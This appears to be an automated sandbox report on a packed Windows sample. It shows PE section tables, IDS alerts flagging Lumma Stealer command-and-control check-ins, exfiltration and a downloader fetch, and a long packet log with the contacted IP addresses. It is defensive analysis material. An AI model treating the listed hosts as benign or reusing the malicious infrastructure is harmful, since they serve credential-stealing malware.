                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  0x10000x560000x26200a5994dc1fbb4e23ba4da6a0fa0ffede5False0.9993019979508196data7.9815761329960475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0x570000x2b00x200c6b548058262824567cc7f22a06f1beaFalse0.79296875data6.028511516695653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  0x590000x29f0000x200c79c49ce197985986b8b8fe1f0c9a4daunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  rriqemsb0x2f80000x1980000x1976001cd22e8b38a40820a62d027f40164843False0.9946638155876035data7.954348593087334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  gdzxkufk0x4900000x10000x400fb10f047f53377155e3a207c0be171c8False0.7001953125data5.730097389811441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .taggant0x4910000x30000x2200fb7e20f95ba1c551090188e5b9bb10e7False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_MANIFEST0x48f3380x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  kernel32.dlllstrcpy
                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-11-23T19:52:17.270597+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:17.959832+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749701104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:17.959832+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:19.948553+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:20.719769+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749703104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:20.719769+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749703104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:22.423255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:25.083557+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749715104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:25.990570+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749715104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:27.647335+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749721104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:30.272836+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749728104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:34.074667+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749737104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:42.278433+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749754104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:43.039423+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749754104.21.33.116443TCP
                                                                                                                                                                                  2024-11-23T19:52:44.613890+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.749760185.215.113.1680TCP
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 23, 2024 19:52:08.005147934 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                  Nov 23, 2024 19:52:08.395821095 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:52:08.395848036 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:52:08.489562035 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:52:12.021378040 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                  Nov 23, 2024 19:52:12.395797014 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                  Nov 23, 2024 19:52:12.817648888 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                  Nov 23, 2024 19:52:13.145780087 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                  Nov 23, 2024 19:52:14.645765066 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                  Nov 23, 2024 19:52:16.045826912 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:16.045855045 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:16.045936108 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:16.049593925 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:16.049611092 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.270510912 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.270596981 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:17.274626017 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:17.274643898 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.275002956 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.317673922 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:17.332051039 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:17.332110882 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:17.332226992 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.630177021 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                  Nov 23, 2024 19:52:17.925010920 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:17.925044060 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.925123930 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:17.925434113 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:17.925446033 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.959836006 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.959932089 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:17.959980011 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:17.969060898 CET49701443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:17.969089031 CET44349701104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:18.005206108 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:52:18.005539894 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:52:18.098964930 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:52:18.629475117 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:18.629553080 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:18.629627943 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:18.630917072 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:18.630949020 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.745668888 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.745793104 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:19.748363972 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:19.748373032 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.748672009 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.756283045 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:19.803337097 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.948482990 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.948553085 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:19.949750900 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:19.949764967 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.950037003 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:19.952917099 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:19.952955961 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:19.953011990 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.230072021 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.230106115 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.230122089 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.230189085 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.230211973 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.230274916 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.418759108 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.418787956 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.418915033 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.418932915 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.418976068 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.461927891 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.461946964 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.462023973 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.462038040 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.462081909 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.604060888 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.604098082 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.604170084 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.604186058 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.604222059 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.604249954 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.644483089 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.644505978 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.644613028 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.644629955 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.644681931 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.667435884 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.667455912 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.667540073 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.667551994 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.667599916 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.687062979 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.687078953 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.687143087 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.687150955 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.687196016 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.719784975 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.719835043 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.719875097 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.719938040 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.719950914 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.719995022 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.719999075 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.720009089 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.720072031 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.720081091 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.728518963 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.728573084 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.728583097 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.737407923 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.737507105 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.737517118 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.786453962 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.786468983 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.798532009 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.798552990 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.798631907 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.798644066 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.798687935 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.817231894 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.817251921 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.817451000 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.817457914 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.817543030 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.832082987 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.832098961 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.832293987 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.832302094 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.832360983 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.833312035 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.848026991 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.848922968 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.848965883 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.848988056 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.848995924 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.849055052 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.865155935 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.865171909 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.865250111 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.865256071 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.865268946 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.865303993 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.865345001 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.866147041 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.866162062 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.895817041 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.905966043 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.906016111 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.906133890 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.907172918 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.907207966 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.907269955 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.907455921 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.907469988 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.908448935 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.908459902 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.908518076 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.908575058 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.908592939 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.908678055 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.908688068 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.909322977 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.909334898 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.909384966 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.910154104 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.910178900 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.910228968 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.910273075 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.910281897 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.910377026 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:20.910387993 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.920839071 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.924832106 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.924987078 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.925225019 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.925239086 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:20.925259113 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:20.925266981 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:21.040740013 CET49709443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:21.040779114 CET44349709104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:21.040910006 CET49709443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:21.041165113 CET49709443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:21.041178942 CET44349709104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:21.232393026 CET44349700104.98.116.138192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:21.232539892 CET49700443192.168.2.7104.98.116.138
                                                                                                                                                                                  Nov 23, 2024 19:52:22.423167944 CET44349709104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:22.423254967 CET49709443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:22.427033901 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                  Nov 23, 2024 19:52:22.610352039 CET49709443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:22.610377073 CET44349709104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:22.610719919 CET44349709104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:22.612696886 CET49709443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:22.613074064 CET49709443192.168.2.7104.21.33.116
                                                                                                                                                                                  Nov 23, 2024 19:52:22.613110065 CET44349709104.21.33.116192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:22.734153986 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:22.736670017 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:22.736690044 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:22.737517118 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:22.737521887 CET4434970413.107.246.63192.168.2.7
